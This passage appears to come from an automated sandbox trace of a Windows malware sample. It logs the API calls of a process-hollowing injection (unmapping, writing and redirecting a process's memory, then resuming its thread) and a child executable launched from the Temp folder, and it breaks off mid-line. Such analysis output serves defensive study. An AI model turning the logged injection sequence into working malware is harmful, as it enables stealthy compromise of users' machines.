[351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0174.735] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdb008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0174.735] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0174.735] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0174.735] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x284758*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x284758*, lpNumberOfBytesWritten=0x0) returned 1 [0174.736] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x284b58, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0174.736] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x284b58*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x284b58*, lpNumberOfBytesWritten=0x0) returned 1 [0174.745] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x2d9158*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d9158*, lpNumberOfBytesWritten=0x0) returned 1 [0174.745] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdb008, lpBuffer=0x28488c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x28488c*, lpNumberOfBytesWritten=0x0) returned 1 [0174.745] SetThreadContext (hThread=0x48, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdb000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0174.746] ResumeThread (hThread=0x48) returned 0x1 [0174.746] CloseHandle (hObject=0x48) returned 1 [0174.746] CloseHandle (hObject=0x4c) returned 1 [0174.746] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0174.747] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0174.747] ExitProcess (uExitCode=0x0) Process: id = "310" image_name = "wspgagwn.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe" page_root = "0x7ea16c20" os_pid = "0xf68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "309" os_parent_pid = "0xda0" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24031 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24032 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 24033 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 24034 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 24035 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24036 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24037 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24038 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 24039 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24040 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24041 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24042 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 24043 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 24044 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 24045 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24046 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24047 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 24048 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24049 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 24050 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24051 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24052 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24053 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24054 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 24055 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24056 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 24057 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24058 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24059 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24060 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24061 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24062 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 24063 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 24064 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 24065 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 24066 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 24067 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 24088 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 24089 start_va = 0x1440000 end_va = 0x156ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 24090 start_va = 0x1570000 end_va = 0x183efff entry_point = 0x1570000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 24091 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 24092 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 24098 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 24099 start_va = 0x1840000 end_va = 0x193ffff entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Region: id = 24100 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 24101 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24102 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 24103 start_va = 0x1940000 end_va = 0x1a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 24104 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 24105 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 24121 start_va = 0x1a70000 end_va = 0x1b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a70000" filename = "" Region: id = 24122 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 24123 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 411 os_tid = 0x728 [0174.873] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0174.873] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0174.874] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0174.875] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0174.876] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0174.876] GetProcAddress 